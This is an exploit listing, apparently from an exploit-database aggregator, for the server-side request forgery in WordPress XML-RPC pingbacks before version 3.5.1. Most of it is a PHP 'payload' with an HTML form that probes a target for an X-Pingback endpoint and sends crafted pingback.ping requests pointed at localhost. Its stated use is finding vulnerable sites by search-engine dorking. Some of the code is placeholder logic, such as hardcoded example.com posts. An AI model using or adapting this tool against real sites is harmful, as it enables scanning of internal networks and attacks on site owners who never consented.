Exploit for WordPress Pingback Checker Server-Side Request Forgery

Name: Exploit for WordPress Pingback Checker Server-Side Request Forgery
Rating: 5 (53 reviews)
2025-03-06 | CVSS 7.2
## https://sploitus.com/exploit?id=PACKETSTORM:189590
=============================================================================================================================================
    | # Title     : WordPress before 3.5.1 Pingback Checker Tool                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The XMLRPC API in WordPress before 3.5.1 allows remote attackers to send HTTP requests to intranet servers, and conduct port-scanning attacks, by specifying a crafted source URL for a pingback, related to a Server-Side Request Forgery (SSRF) issue.
       
    [+] save code as poc.php.
    
    [+] USage : http://127.0.0.1/poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class WordpressPingbackLocator {
        private $targetUri;
        private $numRedirects;
        private $dbActive;
    
        public function __construct($targetUri = '/', $numRedirects = 10) {
            $this->targetUri = rtrim($targetUri, '/') . '/';
            $this->numRedirects = $numRedirects;
            $this->dbActive = $this->checkDatabase();
        }
    
        private function checkDatabase() {
            // تحقق مما إذا كان هناك اتصال بقاعدة البيانات
            return function_exists('mysqli_connect');
        }
    
        public function getXmlRpcUrl($ip) {
            echo "$ip - Enumerating XML-RPC URI...\n";
            
            $headers = get_headers("http://$ip{$this->targetUri}", 1);
            if (isset($headers['X-Pingback'])) {
                return $headers['X-Pingback'];
            }
            echo "$ip - X-Pingback header not found\n";
            return null;
        }
    
        public function generatePingbackXml($target, $validBlogPost) {
            return "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>" .
                   "<methodCall><methodName>pingback.ping</methodName>" .
                   "<params><param><value><string>$target</string></value></param>" .
                   "<param><value><string>$validBlogPost</string></value></param>" .
                   "</params></methodCall>";
        }
    
        public function getBlogPosts($xmlRpc, $ip) {
            $blogPosts = $this->getAllBlogPosts();
            foreach ($blogPosts as $blogPost) {
                $response = $this->sendPingbackRequest($xmlRpc, 'http://127.0.0.1', $blogPost);
                if ($response && strpos($response, '<value><int>33</int></value>') === false) {
                    echo "$ip - Pingback enabled: $blogPost\n";
                    return $blogPost;
                }
            }
            return null;
        }
    
        private function sendPingbackRequest($xmlRpc, $target, $blogPost) {
            $pingbackXml = $this->generatePingbackXml($target, $blogPost);
            $ch = curl_init($xmlRpc);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $pingbackXml);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function getAllBlogPosts() {
            return ["http://example.com/post1", "http://example.com/post2"];
        }
    
        public function runHost($ip) {
            echo "$ip - Checking if it's a WordPress site...\n";
            $xmlrpc = $this->getXmlRpcUrl($ip);
            if (!$xmlrpc) {
                echo "$ip - Not vulnerable or not a WordPress site\n";
                return;
            }
    
            $blogPost = $this->getBlogPosts($xmlrpc, $ip);
            if ($blogPost && $this->dbActive) {
                $this->storeVuln($ip, $blogPost);
            } else {
                echo "$ip - X-Pingback enabled but no vulnerable blogs found\n";
            }
        }
    
        private function storeVuln($ip, $blog) {
            echo "Stored vulnerability: $ip - Pingback found at $blog\n";
        }
    }
    
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $target = $_POST['target'] ?? '';
        if (!empty($target)) {
            $scanner = new WordpressPingbackLocator('/wordpress/');
            $scanner->runHost($target);
        }
    }
    ?>
    
    <!DOCTYPE html>
    <html lang="ar">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>فحص WordPress Pingback</title>
    </head>
    <body>
        <h2>أداة فحص WordPress Pingback</h2>
        <form method="POST">
            <label for="target">أدخل عنوان الموقع:</label>
            <input type="text" id="target" name="target" required>
            <button type="submit">فحص</button>
        </form>
    </body>
    </html>
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================